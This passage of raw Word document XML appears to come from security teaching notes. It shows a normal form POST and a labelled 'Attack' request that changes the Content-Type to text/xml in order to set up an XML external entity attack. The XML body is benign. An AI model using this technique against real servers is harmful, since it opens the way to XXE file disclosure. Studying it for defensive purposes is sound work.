        <w:t>XXE attacks via modified content type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF1508B" w14:textId="305F4B15" w:rsidR="00152206" w:rsidRPr="00152206" w:rsidRDefault="00152206" w:rsidP="00152206">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Normal request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747FF6B8" w14:textId="2731009D" w:rsidR="00152206" w:rsidRPr="00152206" w:rsidRDefault="00152206" w:rsidP="00152206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POST /action HTTP/1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C28E2A8" w14:textId="77777777" w:rsidR="00152206" w:rsidRPr="00152206" w:rsidRDefault="00152206" w:rsidP="00152206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Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778C43EF" w14:textId="77777777" w:rsidR="00152206" w:rsidRPr="00152206" w:rsidRDefault="00152206" w:rsidP="00152206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Content-Length: 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B17203C" w14:textId="77777777" w:rsidR="00152206" w:rsidRPr="00152206" w:rsidRDefault="00152206" w:rsidP="00152206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</w:p>
    <w:p w14:paraId="792E047D" w14:textId="213C73BE" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00152206" w:rsidP="00152206">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr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foo=bar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4696764B" w14:textId="15450606" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1404C170" w14:textId="380D3CA1" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00152206" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B92D91" w14:textId="77777777" w:rsidR="00152206" w:rsidRPr="00152206" w:rsidRDefault="00152206" w:rsidP="00152206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POST /action HTTP/1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73160351" w14:textId="77777777" w:rsidR="00152206" w:rsidRPr="00152206" w:rsidRDefault="00152206" w:rsidP="00152206">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr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Content-Type: </w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>text/xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8A2D24" w14:textId="77777777" w:rsidR="00152206" w:rsidRPr="00152206" w:rsidRDefault="00152206" w:rsidP="00152206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Content-Length: 52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F29B84" w14:textId="77777777" w:rsidR="00152206" w:rsidRPr="00152206" w:rsidRDefault="00152206" w:rsidP="00152206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</w:p>
    <w:p w14:paraId="6EDBC653" w14:textId="4744DDD6" w:rsidR="00152206" w:rsidRPr="00152206" w:rsidRDefault="00152206" w:rsidP="00152206">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015220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&lt;?xml version="1.0" encoding="UTF-8"?&gt;&lt;foo&gt;bar&lt;/foo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128002DC" w14:textId="53FA610D" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="476A133A" w14:textId="4B707A4D" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3510BAD5" w14:textId="5DDC5591" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68CB93DC" w14:textId="64F4463F" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A37CB3D" w14:textId="197C894D" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59AC13E8" w14:textId="39848951" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C94C0B1" w14:textId="61B11F17" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6302988F" w14:textId="75A392AB" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F3E9978" w14:textId="3F924113" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68D73D62" w14:textId="245ABD62" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="482017D7" w14:textId="123F78A3" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2803BD6A" w14:textId="328647D4" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="647E4BF5" w14:textId="5C34DBD4" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72E24E72" w14:textId="6EE863F9" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64502B56" w14:textId="729B6106" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DE61AC4" w14:textId="0F9DA726" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E221D65" w14:textId="6DCE7532" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2472E046" w14:textId="6612A07D" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73A3CB0D" w14:textId="6DB1A449" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F87A62" w14:textId="217BD0CE" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26062217" w14:textId="5456891F" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16D75004" w14:textId="5D25768E" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0141FBE8" w14:textId="5B69B059" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="009F219A" w14:textId="73D8B2A9" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B4AF38E" w14:textId="656E8532" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BF8BD9B" w14:textId="708ED978" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3339BB98" w14:textId="48DE7861" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19BD09FE" w14:textId="04350635" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="013BC3D3" w14:textId="6CD41B57" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2029C076" w14:textId="7CC92470" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B87D805" w14:textId="3577110F" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33D62CBD" w14:textId="3A7F22A8" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A615243" w14:textId="429D95E7" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="328C9649" w14:textId="566E406A" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EAA10CD" w14:textId="3D5370B3" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45174FE7" w14:textId="2A6138B2" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EC8CE17" w14:textId="289748DC" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ED2E72E" w14:textId="0BFB9F97" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F260918" w14:textId="0137C220" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="531F0863" w14:textId="689191BC" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3390C173" w14:textId="535A1EAF" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43580B79" w14:textId="23BCEA04" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="216A52C1" w14:textId="06F56B8A" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="102B542B" w14:textId="6948B096" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24AB68D3" w14:textId="5EE12391" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E1E655D" w14:textId="6F238C01" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41BEFFDE" w14:textId="576ACB14" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36FD9987" w14:textId="39F7B306" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E9BC4FE" w14:textId="68E13FFA" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="246055D4" w14:textId="1EC97119" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31047FB5" w14:textId="14A4225E" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77C71AEE" w14:textId="2C6111CD" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22F4AA55" w14:textId="1F3755F3" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28E9014D" w14:textId="0DE3BF64" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75321FB0" w14:textId="1EF6A444" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77088BF5" w14:textId="1DEE2C3E" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55241246" w14:textId="63DDF9C5" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55C3DB73" w14:textId="55C69F4C" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FD9FC41" w14:textId="28AF14B1" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FB9A44A" w14:textId="6FE08A7D" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="142DD4EC" w14:textId="3D4E30C9" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BB25AB2" w14:textId="044E4A0A" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A7B2059" w14:textId="7094D171" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1833D776" w14:textId="17DD83A4" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="280FDFC7" w14:textId="0408ADCA" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BFFBF5A" w14:textId="7D5CB689" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68D3939D" w14:textId="17D2D2F7" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DF41AE9" w14:textId="68B91391" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F3080FD" w14:textId="22D11F30" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BA62D88" w14:textId="412DA3FB" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EF8AB67" w14:textId="74D45260" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1069236A" w14:textId="2C805AC6" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5327196C" w14:textId="1E07269E" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="136141D6" w14:textId="15275855" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21746117" w14:textId="08BD6947" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="657C8BED" w14:textId="7610F9B5" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04488334" w14:textId="6CDE0B79" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D6B19E5" w14:textId="30CD2043" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
